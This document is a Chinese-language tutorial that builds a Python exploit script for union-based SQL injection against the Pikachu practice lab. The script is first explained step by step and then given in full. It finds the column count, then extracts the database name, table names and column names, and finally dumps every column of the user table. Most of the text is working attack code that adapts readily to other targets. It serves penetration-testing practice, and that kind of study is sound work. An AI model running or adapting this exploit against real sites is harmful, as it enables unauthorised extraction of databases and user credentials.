exp编写
这里以基于联合注入的exp为例子
1. 全局变量
对数据存储以及http包头的自定义
url = "http://192.168.110.131/pikachu-master/vul/sqli/sqli_str.php" # 要验证注入点的url
payload = "' union select 1" # 初始payload
db = "" # 存储数据库名
tb = [] # 存储表名
cb = [] # 存储列名
user = [] # 存储查询的user表内容
head = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "} # 自定义http包头
2.猜字段数
通过循环增加字段的数量发包,根据返回包正则匹配判断是否找到字段数
def column(column_num=""): # 猜字段数
for i in range(len(column_num)): # 猜列数
for j in range(i + 1): # 循环增加字段数量
column_num += "," + str(j + 2)
sqlname = {"name": column_num + "#", "submit": "查询"} # 注入参数
res = requests.get(url=url, headers=head, params=sqlname) # 发起get请求
if not re.findall("The used SELECT statements have a different number of columns", res.text): # 返回包匹配是否猜到字段数,并退出循环
print("字段数:", j + 2)
print("payload:" + column_num + "#")
global payload
payload = column_num
break
3.查询当前数据库名字
通过查询database(),得到数据库名
def database_name(payload_database=""): # 联合查询数据库名
payload_database = payload_database.replace("1", "database()", 1) # 将第一个查询的字段更改为我们需要查询的数据库名
sqlname = {"name": payload_database + "#", "submit": "查询"} # 注入参数
res = requests.get(url=url, headers=head, params=sqlname) # 发起get请求
dbname = re.findall("<p class='notice'>your uid:(.+?) <br />", res.text) # 返回包正则匹配查询到的数据库名
global db
db = dbname[0] # 将查询到的数据库名存储到全局变量db
print("数据库:" + db)
print("payload:" + payload_database + "#") # 当前使用的payload
4. 查询表名
通过mysql的information_schema表来获得数据库里所有的表名。
在MySQL中,把 information_schema 看作是一个数据库,确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权 限等。在INFORMATION_SCHEMA中,有数个只读表。它们实际上是视图,而不是基本表,因此,你将无法看到与之相关的任何文件。具体有关information_schema表参考https://wenku.baidu.com/view/f00d66346ddb6f1aff00bed5b9f3f90f76c64d34.html
def table_name(payload_table=""): # 联合查询表名
payload_table = payload_table.replace("1","table_name") + " from information_schema.tables where table_schema=" + "\'" + db + "\'"
sqlname = {"name": payload_table + "#", "submit": "查询"} # 注入参数
res = requests.get(url=url, headers=head, params=sqlname) # 发起get请求
tb_name = re.findall("<p class='notice'>your uid:(.+?) <br />", res.text) # 返回包正则匹配提取表名
print(db, "下的所有表名:", tb_name)
global tb #将表名存储到全局变量tb
tb = tb_name
print("payload:" + payload_table + "#") # 当前使用的payload
5.查询user表的列名
这里只查询了user表作为实例,对代码稍作修改就可以查询更多表、
def column_user(payload_user=""): # 联合查询列名
payload_user = payload_user.replace("1","column_name") + " from information_schema.columns where table_schema=" + "\'" + db + "\'" + " and table_name=" + "\'" + tb[3] + "\'"
sqlname = {"name": payload_user + "#", "submit": "查询"} # 注入参数
res = requests.get(url=url, headers=head, params=sqlname) # 发起get请求
cb_name = re.findall("<p class='notice'>your uid:(.+?) <br />", res.text) # 返回包正则匹配提取列名
print(tb[3]+"表下的所有列:\n",cb_name)
global cb #将列名存储到全局变量cb
cb = cb_name
6.查询user表的内容
根据查询到的表名,列名查询user表的全部内容
def user_table(payload_usertable=""): #查询user表
payload_usertable = payload_usertable + " from " + tb[3] #拼接查询表名
for i in range(len(cb)): #循环查询每一列
payload_user_table = payload_usertable.replace("1", cb[i]) or payload_usertable.replace(cb[i - 1], cb[i]) #替换列名查询
sqlname = {"name": payload_user_table + "#", "submit": "查询"} # 注入参数
res = requests.get(url=url, headers=head, params=sqlname) # 发起get请求
user_1 = re.findall("<p class='notice'>your uid:(.+?) <br />", res.text) # 返回包正则匹配提取查询的的内容
global user #将内容存储到全局变量user中
user.append(user_1)
7.输出查询到的user表内容
if __name__ == '__main__':
column(payload)
database_name(payload)
table_name(payload)
column_user(payload)
user_table(payload)
for i in range(len(cb)):
print(cb[i], ":", user[i])
8.完整exp
import re
import requests
url = "http://192.168.110.131/pikachu-master/vul/sqli/sqli_str.php" # 要验证注入点的url
payload = "' union select 1" # 初始payload
db = "" # 存储数据库名
tb = [] # 存储表名
cb = [] # 存储列名
user = [] # 存储查询的user表内容
head = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "} # 自定义http包头
def column(column_num=""): # 猜字段数
for i in range(len(column_num)): # 猜列数
for j in range(i + 1): # 循环增加字段数量
column_num += "," + str(j + 2)
sqlname = {"name": column_num + "#", "submit": "查询"} # 注入参数
res = requests.get(url=url, headers=head, params=sqlname) # 发起get请求
if not re.findall("The used SELECT statements have a different number of columns",res.text): # 返回包匹配是否猜到字段数,并退出循环
# print("字段数:", j + 2)
# print("payload:" + column_num + "#")
global payload
payload = column_num
break
def database_name(payload_database=""): # 联合查询数据库名
payload_database = payload_database.replace("1", "database()", 1) # 将第一个查询的字段更改为我们需要查询的数据库名
sqlname = {"name": payload_database + "#", "submit": "查询"} # 注入参数
res = requests.get(url=url, headers=head, params=sqlname) # 发起get请求
dbname = re.findall("<p class='notice'>your uid:(.+?) <br />", res.text) # 返回包正则匹配查询到的数据库名
global db
db = dbname[0] # 将查询到的数据库名存储到全局变量db
# print("数据库:" + db)
# print("payload:" + payload_database + "#") # 当前使用的payload
def table_name(payload_table=""): # 联合查询表名
payload_table = payload_table.replace("1","table_name") + " from information_schema.tables where table_schema=" + "\'" + db + "\'"
sqlname = {"name": payload_table + "#", "submit": "查询"} # 注入参数
res = requests.get(url=url, headers=head, params=sqlname) # 发起get请求
tb_name = re.findall("<p class='notice'>your uid:(.+?) <br />", res.text) # 返回包正则匹配提取表名
# print(db, "下的所有表名:", tb_name)
global tb # 将表名存储到全局变量tb
tb = tb_name
# print("payload:" + payload_table + "#") # 当前使用的payload
def column_user(payload_user=""): # 联合查询列名
payload_user = payload_user.replace("1","column_name") + " from information_schema.columns where table_schema=" + "\'" + db + "\'" + " and table_name=" + "\'" + tb[3] + "\'"
sqlname = {"name": payload_user + "#", "submit": "查询"} # 注入参数
res = requests.get(url=url, headers=head, params=sqlname) # 发起get请求
cb_name = re.findall("<p class='notice'>your uid:(.+?) <br />", res.text) # 返回包正则匹配提取列名
# print(tb[3]+"表下的所有列:\n",cb_name)
global cb # 将列名存储到全局变量cb
cb = cb_name
def user_table(payload_usertable=""): # 查询user表
payload_usertable = payload_usertable + " from " + tb[3] # 拼接查询表名
for i in range(len(cb)): # 循环查询每一列
payload_user_table = payload_usertable.replace("1", cb[i]) or payload_usertable.replace(cb[i - 1],cb[i]) # 替换列名查询
sqlname = {"name": payload_user_table + "#", "submit": "查询"} # 注入参数
res = requests.get(url=url, headers=head, params=sqlname) # 发起get请求
user_1 = re.findall("<p class='notice'>your uid:(.+?) <br />", res.text) # 返回包正则匹配提取查询的的内容
global user # 将内容存储到全局变量user中
user.append(user_1)
if __name__ == '__main__':
column(payload)
database_name(payload)
table_name(payload)
column_user(payload)
user_table(payload)
for i in range(len(cb)):
print(cb[i], ":", user[i])
# print(db)
# print(tb)
# print(cb)
# print(user)